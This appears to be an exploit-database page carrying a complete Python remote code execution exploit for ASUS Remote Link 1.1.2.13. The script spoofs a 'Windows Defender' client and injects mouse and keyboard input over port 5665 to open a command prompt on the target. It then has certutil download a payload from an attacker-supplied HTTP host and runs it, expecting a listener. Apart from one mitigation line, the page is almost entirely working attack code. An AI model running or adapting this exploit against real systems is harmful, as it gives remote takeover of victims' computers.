header-logo
Suggest Exploit
vendor:
Remote Link
by:
H4rk3nz0
9.8
CVSS
HIGH
Remote Code Execution
78
CWE
Product Name: Remote Link
Affected Version From: 1.1.2.13
Affected Version To: 1.1.2.13
Patch Exists: YES
Related CWE: N/A
CPE: a:asus:remotelink:1.1.2.13
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows 10 Enterprise Build 17763
2021

Exploit: ASUS Remote Link 1.1.2.13 – Remote Code Execution

This exploit is for ASUS Remote Link 1.1.2.13. It allows an attacker to execute arbitrary code on the target system by sending a specially crafted payload. The payload is generated by converting the ASCII characters of the payload name to their corresponding hexadecimal values. The payload is then sent to the target system via a socket connection on port 5665.

Mitigation:

Ensure that the ASUS Remote Link application is up to date and that all security patches are applied.
Source

Exploit-DB raw data:

# Exploit: ASUS Remote Link 1.1.2.13 - Remote Code Execution
# Date: 24-02-2021
# Exploit Author: H4rk3nz0
# Vendor Homepage: http://asus.com/
# Software Link: http://remotelink.asus.com/
# Version: 1.1.2.13
# Tested on: Windows 10 Enterprise Build 17763
# CVE: N/A

#!/usr/bin/python

import socket
from time import sleep
import sys


port = 5665
target = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

prefix = "04020b02"
suffix = "0000020000000000000000000300000000000000000004000000000000000000010000"
enter = (prefix + ("0" * 1038)).decode("hex")
string_prefix = "04020b0200000000010000"
string_suffix = "0" * 1022
pre_command = "04000b0200000000".decode("hex")
user_declare = ("02028a0000000000000057696e646f777320446566656e646572" + "0" * 224).decode("hex") # Declares Connection Source as 'Windows Defender'

# ASCII to Hex Character List
characters={
	"A":"41","B":"42","C":"43","D":"44","E":"45","F":"46","G":"47","H":"48","I":"49","J":"4a","K":"4b","L":"4c","M":"4d","N":"4e",
	"O":"4f","P":"50","Q":"51","R":"52","S":"53","T":"54","U":"55","V":"56","W":"57","X":"58","Y":"59","Z":"5a",
	"a":"61","b":"62","c":"63","d":"64","e":"65","f":"66","g":"67","h":"68","i":"69","j":"6a","k":"6b","l":"6c","m":"6d","n":"6e",
	"o":"6f","p":"70","q":"71","r":"72","s":"73","t":"74","u":"75","v":"76","w":"77","x":"78","y":"79","z":"7a",
	"1":"31","2":"32","3":"33","4":"34","5":"35","6":"36","7":"37","8":"38","9":"39","0":"30",
	" ":"20","+":"2b","=":"3d","/":"2f","_":"5f","<":"3c",
	">":"3e","[":"5b","]":"5d","!":"21","@":"40","#":"23","$":"24","%":"25","^":"5e","&":"26","*":"2a",
	"(":"28",")":"29","-":"2d","'":"27",'"':"22",":":"3a",";":"3b","?":"3f","`":"60","~":"7e",
	"\\":"5c","|":"7c","{":"7b","}":"7d",",":"2c",".":"2e"}


# User Specified arguments
try:
	rhost = "192.168.1.93"
	lhost = sys.argv[2]
	payload = sys.argv[3]
except:
	print("Usage: python " + sys.argv[0] + " <target-ip> <local-http-ip> <payload-name>")
	exit()

# HandShake Packets to Smart Gesture Server
def Handshake():
	target.connect((rhost,port))
	target.sendto("b2".decode("hex"),(rhost,port))
	target.sendto("38323538".decode("hex"),(rhost,port))
	target.sendto("03000f0000000000".decode("hex"),(rhost,port))
	target.sendto("03020f000000000003310000000000".decode("hex"),(rhost,port))
	target.sendto("02008a0000000000".decode("hex"),(rhost,port))
	target.sendto(user_declare,(rhost,port))
	sleep(0.1)


def MoveMouse():
	for i in range(0,16):
		target.sendto("0000330038040006".decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101db010000c502" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101d0010000ca02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101c7010000ce02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101bd010000d202" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101b2010000d502" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101a6010000d802" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010199010000db02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601018d010000de02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010180010000e002" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010171010000e402" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010163010000e602" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010154010000e902" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010146010000eb02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601013b010000ed02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601012d010000f002" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010120010000f302" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010113010000f702" + suffix).decode("hex"),(rhost,port))
		target.sendto(("0001330038040006010107010000fa02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101fa000000fd02" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101f10000000003" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101e50000000303" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101d90000000603" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101ce0000000903" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101c20000000d03" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101b60000001103" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101ab0000001403" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101a00000001803" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101950000001c03" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101890000002003" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601017e0000002403" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101740000002703" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601016c0000002a03" + suffix).decode("hex"),(rhost,port))
		target.sendto(("00013300380400060101650000002c03" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601015c0000002f03" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000133003804000601015c0000003003" + suffix).decode("hex"),(rhost,port))
		target.sendto(("000233003804000601005c0000003003" + suffix).decode("hex"),(rhost,port))
		sleep(0.6)

# Sends Left Click Input (Occasional Delay for some Reason)
def LeftClick():
	target.sendto("0000330038040006".decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0001330038040006010116020000e502" + suffix).decode("hex"),(rhost,port))
	target.sendto(("0002330038040006010016020000e502" + suffix).decode("hex"),(rhost,port))
	sleep(4)

# Send Enter/Return Key Input
def SendReturn():
	target.sendto(pre_command,(rhost,port))
	sleep(0.2)
	target.sendto(enter,(rhost,port)) # Enter/Return Key

# Send String Characters
def SendString(string):
	for char in string:
		convert = characters[char]
		final_string = string_prefix + convert + string_suffix
		target.sendto(pre_command,(rhost,port))
		target.sendto(final_string.decode("hex"),(rhost,port))
		sleep(0.2)

# Main Execution
def main():
	print("[+] Saying Hello")
	Handshake()
	sleep(2)
	print("[+] Moving Mouse")
	MoveMouse()
	print("[+] Left Clicking (takes a few seconds)")
	LeftClick() # Left Click is delayed sometimes
	print("[+] Opening CMD")
	SendString("cmd.exe") # Start Command Prompt
	sleep(0.5)
	SendReturn()
	sleep(1)
	print("[+] Retrieving Payload")
	SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload
	sleep(0.5)
	SendReturn()
	sleep(3)
	print("[+] Executing")
	SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload
	sleep(0.5)
	SendReturn()
	sleep(0.5)
	print("[+] Done! Check your listener?")
	SendReturn() # Trailing Enter Command Ensures full execution
	target.close()
	exit()

if __name__=="__main__":
	main()

Navigation

Suggest Exploit

Services By CQR